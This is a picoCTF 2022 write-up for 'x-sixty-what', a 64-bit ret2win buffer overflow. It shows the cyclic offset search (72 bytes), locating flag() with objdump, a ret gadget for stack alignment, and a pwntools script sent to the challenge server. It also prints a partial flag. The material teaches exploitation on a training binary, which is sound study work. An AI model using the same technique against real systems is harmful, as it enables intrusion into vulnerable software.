x-sixty-what picoCTF 2022 Solution

Published: July 20, 2023

Description

A 64-bit buffer overflow with no stack canary. Overflow the stack buffer to control RIP (the 64-bit instruction pointer) and redirect execution to a flag-printing function.

Key difference from 32-bit: 64-bit binaries use registers (RDI, RSI, RDX...) for the first six arguments, and RIP is 8 bytes wide - addresses must be packed with p64().

Download the binary and make it executable.

Check security mitigations with checksec.

Use pwntools to find the offset and the address of the flag function.

bash
wget https://artifacts.picoctf.net/c/192/vuln && chmod +x vuln
bash
checksec --file=vuln
bash
objdump -d vuln | grep '<flag>'
For a step-by-step walkthrough of stack overflows, ret2win, and ROP scaffolding (cyclic offset, p64 packing, alignment), see the Buffer Overflow Binary Exploitation guide.
  1. Step 1Identify the offset to RIP (it is 72)
    Generate a cyclic pattern, crash the binary, and read RSP (not RIP: in 64-bit the crash registers differ) to compute the offset. With this binary, the answer is 72.
    bash
    # Pipe a cyclic pattern in to crash the binary:
    cyclic 200 | ./vuln
    
    # In GDB, repeat the run and read the value at the top of the stack at the crash:
    gdb -q ./vuln -ex 'r <<< $(cyclic 200)' -ex 'x/gx $rsp'
    
    # Translate the leaked qword back to the offset:
    python3 -c "from pwn import cyclic_find; print(cyclic_find(0x6161616a61616169, n=8))"
    # -> 72
    Learn more

    x86-64 calling convention (System V AMD64 ABI). The first six integer/pointer arguments go in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Floating-point args go in xmm0..xmm7. Additional args go on the stack. Return value comes back in rax. The stack must be 16-byte aligned at the moment of call.

    Stack at vuln() ret on x86-64:

    high addr  +-------------+
               | saved rip   |  <- 8 bytes, payload[72:80] -> &flag()
               +-------------+
               | saved rbp   |  <- 8 bytes, payload[64:72]
               +-------------+
               | char buf[64]|  <- payload[0:64] = "AAAA..."
    low addr   +-------------+ <- rsp at gets()

    Why crash diagnostics differ from 32-bit. When ret tries to pop a non-canonical address (bits 48-63 must equal bit 47, otherwise the CPU raises #GP), the fault fires before rip is updated. You will see RIP pointing at the ret instruction, not at your pattern. Read $rsp instead to recover the cyclic bytes:

    (gdb) x/gx $rsp
    0x7fffffffe018: 0x6161616a61616169   <- this 8-byte value is your pattern
    
    (gdb) shell python3 -c "from pwn import *; print(cyclic_find(0x6161616a61616169, n=8))"
    72

    The n=8 matters: pwntools' default cyclic uses 4-byte unique substrings. For 64-bit, generate with cyclic(200, n=8) so each 8-byte window is unique.

  2. Step 2Find the flag() function address
    Use objdump or pwntools ELF to locate flag(). Because the binary has no PIE, the address is fixed each run. The objdump line is also a sanity check that the function exists where you expect it.
    bash
    # Confirm the flag() function exists and note its address:
    objdump -d vuln | grep '<flag>:'
    # -> 00000000004011d6 <flag>:
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.symbols['flag']))"
    Learn more

    Without PIE (Position-Independent Executable), the binary is loaded at a fixed base address every time. checksec shows "No PIE" if this is the case. This means the virtual address of flag() in objdump output is exactly what you write into the payload - no calculation needed.

    With PIE enabled, the binary would be loaded at a random base address (ASLR for executables), and you would first need to leak an address from the binary to calculate the actual load address before computing flag()'s runtime address.

  3. Step 3Build the 64-bit exploit
    Pad 72 bytes, then jump to flag(). On x86-64, a bare ret gadget is inserted before flag() so RSP is 16-byte aligned when the function's first SSE instruction (movaps) executes. Skip the gadget and the program crashes inside libc with SIGSEGV before printing anything.
    python
    python3 -c "
    from pwn import *
    elf = ELF('./vuln')
    flag_addr = elf.symbols['flag']
    
    # Find a 'ret' gadget for stack alignment (required for system() / movaps)
    rop = ROP(elf)
    ret_gadget = rop.find_gadget(['ret'])[0]
    
    payload  = b'A' * 72           # offset to RIP
    payload += p64(ret_gadget)     # stack alignment gadget
    payload += p64(flag_addr)      # jump to flag()
    
    p = remote('saturn.picoctf.net', <PORT_FROM_INSTANCE>)
    p.sendlineafter(b'string:', payload)
    print(p.recvall().decode())
    "
    Learn more

    The specific instruction that faults is movaps xmm0, [rsp+offset]: movaps requires its memory operand be 16-byte aligned, while the cousin movups does not. printf, system, and most libc entry points start with a movaps spill, so any 64-bit ret-to-libc-style chain that arrives with rsp = ...0x8 dies on the first instruction. Adding a single bare ret gadget before the target pops one 8-byte slot and shifts rsp back to ...0x0, satisfying alignment.

    p64(addr) packs a 64-bit address as 8 bytes in little-endian order, which is what x86-64 stores on the stack. This is the 64-bit counterpart of p32() used in 32-bit exploits.

    ROP(elf).find_gadget(['ret']) searches the binary for a bare ret instruction and returns its address. This is the simplest possible ROP gadget.

Flag

picoCTF{b1663r_15_b3773r_3...}

Overflow 72 bytes to RIP, add a ret gadget for stack alignment, then jump to flag(). Pack the 64-bit address with p64().

Want more picoCTF 2022 writeups?

Tools used in this challenge

Related reading

What to try next